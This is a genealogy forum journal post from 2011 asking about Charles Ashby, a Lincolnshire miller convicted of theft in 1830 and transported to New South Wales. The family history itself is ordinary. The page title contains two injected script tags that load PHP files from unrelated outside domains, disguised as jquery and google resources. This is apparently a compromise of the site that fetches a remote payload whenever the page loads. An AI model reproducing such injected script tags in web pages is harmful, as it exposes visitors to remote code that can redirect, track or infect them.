"Looking for Charles ASHBY b: 1805 Huntingdonshire, England"<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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"Looking for Charles ASHBY b: 1805 Huntingdonshire, England"

Journal by lynbeale

My 3rd great grandfather Charles ASHBY, born 1805 in Huntingdonshire, England, married Mary EVANS 26 July 1835 in Maitland, NSW, Australia.
Charles died 19 December 1870 in Auckland, New Zealand. They were both 'convicts', he from England, she from Ireland.

Charles and Mary named their children:
William, Margaret, Mary Alice, George, Charles, Samuel, Charles
Samuel ASHBY

Charles ASHBY was a miller and baker in Huntingdonshire, and was convicted of robbing his employer and tried in Lincoln Assizes on 6 March 1830. He was sentenced to Life.

Archives of NSW - Convicts NSW and Van Diemens Land, Microfiche 679 and 697. Male Convicts by Ship 'CamdenI'. The 'Camden' left London on 28 March 1831 and arrived NSW on 25 July 1831, being a voyage of 119 days.

Charles ASHBY of Thurlby, Lincolnshire, a miller, aged 24, convicted at Lincoln Assizes 6 March 1830 with breaking into the house of J Page, at Thurlby and stealing a silver teaspoon. He was sentenced originally to death and then to Life Transportation, and arrived as above Ref. HILL41/5/18.

Does anyone have any information about his life in England or his ancestry? I have been unable to find out who his parents were. Any information would be much appreciated and I am happy to share information.

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on 2011-07-20 19:55:23

lynbeale , from Auckland, New Zealand, has been a Family Tree Circles member since Jul 2011. is researching the following names: BRIGGS, READE, BENTON and 29 other(s).

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